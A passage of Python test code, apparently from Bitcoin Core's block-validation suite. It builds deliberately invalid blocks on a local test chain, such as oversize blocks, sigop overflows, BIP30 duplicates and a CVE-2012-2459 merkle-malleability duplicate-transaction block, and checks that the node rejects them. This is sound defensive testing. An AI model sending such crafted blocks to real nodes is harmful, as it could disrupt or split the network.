self.sync_blocks([b19], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a coinbase at depth too low
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase.")
self.move_tip(15)
b20 = self.next_block(20, spend=out[7])
self.sync_blocks([b20], False, 16, b'bad-txns-premature-spend-of-coinbase')
# Attempt to spend a coinbase at depth too low (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b21 (6) -> b22 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
self.move_tip(13)
b21 = self.next_block(21, spend=out[6])
self.sync_blocks([b21], False)
b22 = self.next_block(22, spend=out[5])
self.sync_blocks([b22], False, 16, b'bad-txns-premature-spend-of-coinbase')
# Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
# \-> b24 (6) -> b25 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
self.move_tip(15)
b23 = self.next_block(23, spend=out[6])
tx = CTransaction()
script_length = MAX_BLOCK_BASE_SIZE - len(b23.serialize()) - 69
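# (illustrative accounting, not from the original comments: the 69 bytes are
# the overhead of the padding tx itself - version, one input with an empty
# scriptSig, output value, counts and locktime - plus the OP_PUSHDATA4
# encoding of the zero-byte element inside the script)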
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
b23 = self.update_block(23, [tx])
# Make sure the math above worked out to produce a max-sized block
assert_equal(len(b23.serialize()), MAX_BLOCK_BASE_SIZE)
self.sync_blocks([b23], True)
self.save_spendable_output()
self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
self.move_tip(15)
b24 = self.next_block(24, spend=out[6])
script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
script_output = CScript([b'\x00' * (script_length + 1)])
tx.vout = [CTxOut(0, script_output)]
b24 = self.update_block(24, [tx])
assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
self.sync_blocks([b24], False, 16, b'bad-blk-length', reconnect=True)
b25 = self.next_block(25, spend=out[7])
self.sync_blocks([b25], False)
# Create blocks with a coinbase input script size out of range
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
# \-> ... (6) -> ... (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with coinbase input script size out of range")
self.move_tip(15)
b26 = self.next_block(26, spend=out[6])
b26.vtx[0].vin[0].scriptSig = b'\x00'
b26.vtx[0].rehash()
# update_block causes the merkle root to get updated, even with no new
# transactions, and updates the required state.
b26 = self.update_block(26, [])
self.sync_blocks([b26], False, 16, b'bad-cb-length', reconnect=True)
# Extend the b26 chain to make sure bitcoind isn't accepting b26
b27 = self.next_block(27, spend=out[7])
self.sync_blocks([b27], False)
# Now try a too-large-coinbase script
self.move_tip(15)
b28 = self.next_block(28, spend=out[6])
b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
b28.vtx[0].rehash()
b28 = self.update_block(28, [])
self.sync_blocks([b28], False, 16, b'bad-cb-length', reconnect=True)
# Extend the b28 chain to make sure bitcoind isn't accepting b28
b29 = self.next_block(29, spend=out[7])
self.sync_blocks([b29], False)
# b30 has a max-sized coinbase scriptSig.
self.move_tip(23)
b30 = self.next_block(30)
b30.vtx[0].vin[0].scriptSig = b'\x00' * 100
b30.vtx[0].rehash()
b30 = self.update_block(30, [])
self.sync_blocks([b30], True)
self.save_spendable_output()
# b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
#
# genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b36 (11)
# \-> b34 (10)
# \-> b32 (9)
#
# MULTISIG: each op code counts as 20 sigops. To create the edge case, pack another 19 sigops at the end.
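# Worked example (illustration): with MAX_BLOCK_SIGOPS = 20000,
# (20000 - 1) // 20 = 999 OP_CHECKMULTISIGs count as 999 * 20 = 19980 sigops;
# the 19 trailing OP_CHECKSIGs bring the script to 19999, and the coinbase's
# single sigop brings the block total to exactly 20000.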
self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
self.sync_blocks([b31], True)
self.save_spendable_output()
# this goes over the limit because the coinbase has one sigop
self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b32], False, 16, b'bad-blk-sigops', reconnect=True)
# CHECKMULTISIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
self.move_tip(31)
lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
self.sync_blocks([b33], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
self.sync_blocks([b34], False, 16, b'bad-blk-sigops', reconnect=True)
# CHECKSIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
self.move_tip(33)
lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
self.sync_blocks([b35], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
self.sync_blocks([b36], False, 16, b'bad-blk-sigops', reconnect=True)
# Check spending of a transaction in a block which failed to connect
#
# b6 (3)
# b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b37 (11)
# \-> b38 (11/37)
#
# save 37's spendable output, but then double-spend out11 to invalidate the block
self.log.info("Reject a block spending transaction from a block which failed to connect")
self.move_tip(35)
b37 = self.next_block(37, spend=out[11])
txout_b37 = b37.vtx[1]
tx = self.create_and_sign_transaction(out[11], 0)
b37 = self.update_block(37, [tx])
self.sync_blocks([b37], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
self.move_tip(35)
b38 = self.next_block(38, spend=txout_b37)
self.sync_blocks([b38], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Check P2SH SigOp counting
#
#
# 13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
# \-> b40 (12)
#
# b39 - create some P2SH outputs that will require 6 sigops to spend:
#
# redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
# p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
#
self.log.info("Check P2SH SIGOPS are correctly counted")
self.move_tip(35)
b39 = self.next_block(39)
b39_outputs = 0
b39_sigops_per_output = 6
# Build the redeem script, hash it, use hash to create the p2sh script
redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
redeem_script_hash = hash160(redeem_script)
p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])
# Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
# This must be signed because it is spending a coinbase
spend = out[11]
tx = self.create_tx(spend, 0, 1, p2sh_script)
tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
self.sign_tx(tx, spend)
tx.rehash()
b39 = self.update_block(39, [tx])
b39_outputs += 1
# Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
tx_new = None
tx_last = tx
total_size = len(b39.serialize())
while total_size < MAX_BLOCK_BASE_SIZE:
tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
tx_new.rehash()
total_size += len(tx_new.serialize())
if total_size >= MAX_BLOCK_BASE_SIZE:
break
b39.vtx.append(tx_new) # add tx to block
tx_last = tx_new
b39_outputs += 1
b39 = self.update_block(39, [])
self.sync_blocks([b39], True)
self.save_spendable_output()
# Test sigops in P2SH redeem scripts
#
# b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
# The first tx has one sigop and then at the end we add 2 more to put us just over the max.
#
# b41 does the same, less one, so it has the maximum sigops permitted.
#
self.log.info("Reject a block with too many P2SH sigops")
self.move_tip(39)
b40 = self.next_block(40, spend=out[12])
sigops = get_legacy_sigopcount_block(b40)
numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
assert_equal(numTxes <= b39_outputs, True)
lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
new_txs = []
for i in range(1, numTxes + 1):
tx = CTransaction()
tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
tx.vin.append(CTxIn(lastOutpoint, b''))
# second input is corresponding P2SH output from b39
tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
# Note: must pass the redeem_script (not p2sh_script) to the signature hash function
(sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
sig = self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))
scriptSig = CScript([sig, redeem_script])
tx.vin[1].scriptSig = scriptSig
tx.rehash()
new_txs.append(tx)
lastOutpoint = COutPoint(tx.sha256, 0)
b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
tx.rehash()
new_txs.append(tx)
self.update_block(40, new_txs)
self.sync_blocks([b40], False, 16, b'bad-blk-sigops', reconnect=True)
# same as b40, but one less sigop
self.log.info("Accept a block with the max number of P2SH sigops")
self.move_tip(39)
b41 = self.next_block(41, spend=None)
self.update_block(41, b40.vtx[1:-1])
b41_sigops_to_fill = b40_sigops_to_fill - 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
tx.rehash()
self.update_block(41, [tx])
self.sync_blocks([b41], True)
# Fork off of b39 to create a constant base again
#
# b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
# \-> b41 (12)
#
self.move_tip(39)
b42 = self.next_block(42, spend=out[12])
self.save_spendable_output()
b43 = self.next_block(43, spend=out[13])
self.save_spendable_output()
self.sync_blocks([b42, b43], True)
# Test a number of really invalid scenarios
#
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
# \-> ??? (15)
# The next few blocks are going to be created "by hand" since they'll do funky things, such as having
# the first transaction be non-coinbase, etc. The purpose of b44 is to make sure this works.
self.log.info("Build block 44 manually")
height = self.block_heights[self.tip.sha256] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
b44 = CBlock()
b44.nTime = self.tip.nTime + 1
b44.hashPrevBlock = self.tip.sha256
b44.nBits = 0x207fffff
b44.vtx.append(coinbase)
b44.hashMerkleRoot = b44.calc_merkle_root()
b44.solve()
self.tip = b44
self.block_heights[b44.sha256] = height
self.blocks[44] = b44
self.sync_blocks([b44], True)
self.log.info("Reject a block with a non-coinbase as the first tx")
non_coinbase = self.create_tx(out[15], 0, 1)
b45 = CBlock()
b45.nTime = self.tip.nTime + 1
b45.hashPrevBlock = self.tip.sha256
b45.nBits = 0x207fffff
b45.vtx.append(non_coinbase)
b45.hashMerkleRoot = b45.calc_merkle_root()
b45.calc_sha256()
b45.solve()
self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
self.tip = b45
self.blocks[45] = b45
self.sync_blocks([b45], False, 16, b'bad-cb-missing', reconnect=True)
self.log.info("Reject a block with no transactions")
self.move_tip(44)
b46 = CBlock()
b46.nTime = b44.nTime + 1
b46.hashPrevBlock = b44.sha256
b46.nBits = 0x207fffff
b46.vtx = []
b46.hashMerkleRoot = 0
b46.solve()
self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
self.tip = b46
assert 46 not in self.blocks
self.blocks[46] = b46
self.sync_blocks([b46], False, 16, b'bad-blk-length', reconnect=True)
self.log.info("Reject a block with invalid work")
self.move_tip(44)
b47 = self.next_block(47, solve=False)
target = uint256_from_compact(b47.nBits)
while b47.sha256 < target:
b47.nNonce += 1
b47.rehash()
self.sync_blocks([b47], False, request_block=False)
self.log.info("Reject a block with a timestamp >2 hours in the future")
self.move_tip(44)
b48 = self.next_block(48, solve=False)
b48.nTime = int(time.time()) + 60 * 60 * 3
b48.solve()
self.sync_blocks([b48], False, request_block=False)
self.log.info("Reject a block with invalid merkle hash")
self.move_tip(44)
b49 = self.next_block(49)
b49.hashMerkleRoot += 1
b49.solve()
self.sync_blocks([b49], False, 16, b'bad-txnmrklroot', reconnect=True)
self.log.info("Reject a block with incorrect POW limit")
self.move_tip(44)
b50 = self.next_block(50)
b50.nBits = b50.nBits - 1
b50.solve()
self.sync_blocks([b50], False, request_block=False, reconnect=True)
self.log.info("Reject a block with two coinbase transactions")
self.move_tip(44)
b51 = self.next_block(51)
cb2 = create_coinbase(51, self.coinbase_pubkey)
b51 = self.update_block(51, [cb2])
self.sync_blocks([b51], False, 16, b'bad-cb-multiple', reconnect=True)
self.log.info("Reject a block with duplicate transactions")
# Note: txns have to be in the right position in the merkle tree to trigger this error
self.move_tip(44)
b52 = self.next_block(52, spend=out[15])
tx = self.create_tx(b52.vtx[1], 0, 1)
b52 = self.update_block(52, [tx, tx])
self.sync_blocks([b52], False, 16, b'bad-txns-duplicate', reconnect=True)
# Test block timestamps
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
# \-> b54 (15)
#
self.move_tip(43)
b53 = self.next_block(53, spend=out[14])
self.sync_blocks([b53], False)
self.save_spendable_output()
self.log.info("Reject a block with timestamp before MedianTimePast")
b54 = self.next_block(54, spend=out[15])
b54.nTime = b35.nTime - 1
b54.solve()
self.sync_blocks([b54], False, request_block=False)
# valid timestamp
self.move_tip(53)
b55 = self.next_block(55, spend=out[15])
b55.nTime = b35.nTime
self.update_block(55, [])
self.sync_blocks([b55], True)
self.save_spendable_output()
# Test Merkle tree malleability
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
# \-> b57 (16)
# \-> b56p2 (16)
# \-> b56 (16)
#
# Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
# affecting the merkle root of a block, while still invalidating it.
# See: src/consensus/merkle.h
#
# b57 has three txns: coinbase, tx, tx1. The merkle root computation will duplicate tx.
# Result: OK
#
# b56 copies b57 but duplicates tx1 and does not recalculate the block hash. So it has a valid merkle
# root but duplicate transactions.
# Result: Fails
#
# b57p2 has six transactions in its merkle tree:
# - coinbase, tx, tx1, tx2, tx3, tx4
# Merkle root calculation will duplicate as necessary.
# Result: OK.
#
# b56p2 copies b57p2 but adds both tx3 and tx4. The purpose of the test is to make sure the code catches
# duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
# that the error was caught early, avoiding a DOS vulnerability.)
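# Sketch of the malleability (assuming the standard pairwise merkle rule where
# an odd final entry is hashed with itself):
#   merkle([cb, tx, tx1])      -> hash(hash(cb|tx), hash(tx1|tx1))
#   merkle([cb, tx, tx1, tx1]) -> hash(hash(cb|tx), hash(tx1|tx1))  # same root
# so appending a duplicate of the last tx changes the tx list but not the
# block hash.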
# b57 - a good block with 2 txs, don't submit until end
self.move_tip(55)
b57 = self.next_block(57)
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
b57 = self.update_block(57, [tx, tx1])
# b56 - copy b57, add a duplicate tx
self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56 = copy.deepcopy(b57)
self.blocks[56] = b56
assert_equal(len(b56.vtx), 3)
b56 = self.update_block(56, [tx1])
assert_equal(b56.hash, b57.hash)
self.sync_blocks([b56], False, 16, b'bad-txns-duplicate', reconnect=True)
# b57p2 - a good block with 6 tx'es, don't submit until end
self.move_tip(55)
b57p2 = self.next_block("57p2")
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
tx2 = self.create_tx(tx1, 0, 1)
tx3 = self.create_tx(tx2, 0, 1)
tx4 = self.create_tx(tx3, 0, 1)
b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])
# b56p2 - copy b57p2, duplicate two non-consecutive tx's
self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56p2 = copy.deepcopy(b57p2)
self.blocks["b56p2"] = b56p2
assert_equal(b56p2.hash, b57p2.hash)
assert_equal(len(b56p2.vtx), 6)
b56p2 = self.update_block("b56p2", [tx3, tx4])
self.sync_blocks([b56p2], False, 16, b'bad-txns-duplicate', reconnect=True)
self.move_tip("57p2")
self.sync_blocks([b57p2], True)
self.move_tip(57)
self.sync_blocks([b57], False) # The tip is not updated because 57p2 seen first
self.save_spendable_output()
# Test a few invalid tx types
#
# -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> ??? (17)
#
# tx with prevout.n out of range
self.log.info("Reject a block with a transaction with prevout.n out of range")
self.move_tip(57)
b58 = self.next_block(58, spend=out[17])
tx = CTransaction()
assert(len(out[17].vout) < 42)
tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
tx.vout.append(CTxOut(0, b""))
tx.calc_sha256()
b58 = self.update_block(58, [tx])
self.sync_blocks([b58], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# tx with output value > input value
self.log.info("Reject a block with a transaction with outputs > inputs")
self.move_tip(57)
b59 = self.next_block(59)
tx = self.create_and_sign_transaction(out[17], 51 * COIN)
b59 = self.update_block(59, [tx])
self.sync_blocks([b59], False, 16, b'bad-txns-in-belowout', reconnect=True)
# reset to good chain
self.move_tip(57)
b60 = self.next_block(60, spend=out[17])
self.sync_blocks([b60], True)
self.save_spendable_output()
# Test BIP30
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b61 (18)
#
# Blocks are not allowed to contain a transaction whose id matches that of an earlier,
# not-fully-spent transaction in the same chain. To test, make identical coinbases;
# the second one should be rejected.
#
self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
self.move_tip(60)
b61 = self.next_block(61, spend=out[18])
b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig # Equalize the coinbases
b61.vtx[0].rehash()
b61 = self.update_block(61, [])
assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
self.sync_blocks([b61], False, 16, b'bad-txns-BIP30', reconnect=True)
# Test that a non-final transaction (per tx.isFinal) is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b62 (18)
#
self.log.info("Reject a block with a transaction with a nonfinal locktime")
self.move_tip(60)
b62 = self.next_block(62)
tx = CTransaction()
tx.nLockTime = 0xffffffff # this locktime is non-final
tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0))) # don't set nSequence
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
assert(tx.vin[0].nSequence < 0xffffffff)
tx.calc_sha256()
b62 = self.update_block(62, [tx])
self.sync_blocks([b62], False, 16, b'bad-txns-nonfinal')
# Test a non-final coinbase is also rejected
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b63 (-)
#
self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
self.move_tip(60)
b63 = self.next_block(63)
b63.vtx[0].nLockTime = 0xffffffff
b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
b63.vtx[0].rehash()
b63 = self.update_block(63, [])
self.sync_blocks([b63], False, 16, b'bad-txns-nonfinal')
# This checks that a block with a bloated VARINT between the block_header and the array of tx such that
# the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
# does not cause a subsequent, identical block with canonical encoding to be rejected. The test does not
# care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
#
# What matters is that the receiving node should not reject the bloated block, and then reject the canonical
# block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
# \
# b64a (18)
# b64a is a bloated block (non-canonical varint)
# b64 is a good block (same as b64a but w/ canonical varint)
#
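# Illustration (assumed CompactSize rules): a tx count below 253 canonically
# serializes as a single byte, but the same value can be bloated to nine
# bytes as b'\xff' + 8-byte little-endian, which is where the +8 in the size
# assertion below comes from.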
self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
self.move_tip(60)
regular_block = self.next_block("64a", spend=out[18])
# make it a "broken_block," with non-canonical serialization
b64a = CBrokenBlock(regular_block)
b64a.initialize(regular_block)
self.blocks["64a"] = b64a
self.tip = b64a
tx = CTransaction()
# use canonical serialization to calculate size
script_length = MAX_BLOCK_BASE_SIZE - len(b64a.normal_serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
b64a = self.update_block("64a", [tx])
assert_equal(len(b64a.serialize()), MAX_BLOCK_BASE_SIZE + 8)
self.sync_blocks([b64a], False, 1, b'error parsing message')
# bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
# resend the header message, it won't send us the getdata message again. Just
# disconnect and reconnect and then call sync_blocks.
# TODO: improve this test to be less dependent on P2P DOS behaviour.
node.disconnect_p2ps()
self.reconnect_p2p()
self.move_tip(60)
b64 = CBlock(b64a)
b64.vtx = copy.deepcopy(b64a.vtx)
assert_equal(b64.hash, b64a.hash)
assert_equal(len(b64.serialize()), MAX_BLOCK_BASE_SIZE)
self.blocks[64] = b64
b64 = self.update_block(64, [])
self.sync_blocks([b64], True)
self.save_spendable_output()
# Spend an output created in the block itself
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
#
self.log.info("Accept a block with a transaction spending an output created in the same block")
self.move_tip(64)
b65 = self.next_block(65)
tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 0)
b65 = self.update_block(65, [tx1, tx2])
self.sync_blocks([b65], True)
self.save_spendable_output()
# Attempt to spend an output created later in the same block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b66 (20)
self.log.info("Reject a block with a transaction spending an output created later in the same block")
self.move_tip(65)
b66 = self.next_block(66)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
b66 = self.update_block(66, [tx2, tx1])
self.sync_blocks([b66], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to double-spend a transaction created in a block
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
# \-> b67 (20)
#
#
self.log.info("Reject a block with a transaction double spending a transaction creted in the same block")
self.move_tip(65)
b67 = self.next_block(67)
tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
tx2 = self.create_and_sign_transaction(tx1, 1)
tx3 = self.create_and_sign_transaction(tx1, 2)
b67 = self.update_block(67, [tx1, tx2, tx3])
self.sync_blocks([b67], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# More tests of block subsidy
#
# -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b68 (20)
#
# b68 - coinbase with an extra 10 satoshis,
# creates a tx that has 9 satoshis from out[20] go to fees
# this fails because the coinbase is trying to claim 1 satoshi too much in fees
#
# b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
# this succeeds
#
self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
self.move_tip(65)
b68 = self.next_block(68, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
b68 = self.update_block(68, [tx])
self.sync_blocks([b68], False, 16, b'bad-cb-amount', reconnect=True)
self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
self.move_tip(65)
b69 = self.next_block(69, additional_coinbase_value=10)
tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 10)
self.update_block(69, [tx])
self.sync_blocks([b69], True)
self.save_spendable_output()
# Test spending the outpoint of a non-existent transaction
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
# \-> b70 (21)
#
self.log.info("Reject a block containing a transaction spending from a non-existent input")
self.move_tip(69)
b70 = self.next_block(70, spend=out[21])
bogus_tx = CTransaction()
bogus_tx.sha256 = uint256_from_str(b"23c70ed7c0506e9178fc1a987f40a33946d4ad4c962b5ae3a52546da53af0c5c")
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(bogus_tx.sha256, 0), b"", 0xffffffff))
tx.vout.append(CTxOut(1, b""))
b70 = self.update_block(70, [tx])
self.sync_blocks([b70], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Test accepting an invalid block which has the same hash as a valid one (via merkle tree tricks)
#
# -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b71 (21)
#
# b72 is a good block.
# b71 is a copy of b72, but re-adds one of its transactions; because of merkle tree malleability it still has the same hash as b72.
self.log.info("Reject a block containing a duplicate transaction but with the same Merkle root (Merkle tree malleability)")
self.move_tip(69)
b72 = self.next_block(72)
tx1 = self.create_and_sign_transaction(out[21], 2)
tx2 = self.create_and_sign_transaction(tx1, 1)
b72 = self.update_block(72, [tx1, tx2]) # now tip is 72
b71 = copy.deepcopy(b72)
b71.vtx.append(tx2) # add duplicate tx2
self.block_heights[b71.sha256] = self.block_heights[b69.sha256] + 1 # b71 builds off b69
self.blocks[71] = b71
assert_equal(len(b71.vtx), 4)
assert_equal(len(b72.vtx), 3)
assert_equal(b72.sha256, b71.sha256)
self.move_tip(71)
self.sync_blocks([b71], False, 16, b'bad-txns-duplicate', reconnect=True)
self.move_tip(72)
self.sync_blocks([b72], True)
self.save_spendable_output()
# Test some invalid scripts and MAX_BLOCK_SIGOPS
#
# -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
# \-> b** (22)
#
# b73 - tx with excessive sigops that are placed after an excessively large script element.
# The purpose of the test is to make sure those sigops are counted.
#
# script is a bytearray of size 20,526
#
# bytearray[0-19,998] : OP_CHECKSIG
# bytearray[19,999] : OP_PUSHDATA4
# bytearray[20,000-20,003]: 521 (max_script_element_size+1, in little-endian format)
# bytearray[20,004-20,524]: unread data (script_element)
# bytearray[20,525] : OP_CHECKSIG (this puts us over the limit)
self.log.info("Reject a block containing too many sigops after a large script element")
self.move_tip(72)
b73 = self.next_block(73)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16) # OP_PUSHDATA4
element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
a[MAX_BLOCK_SIGOPS] = element_size % 256
a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
a[MAX_BLOCK_SIGOPS + 2] = 0
a[MAX_BLOCK_SIGOPS + 3] = 0
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
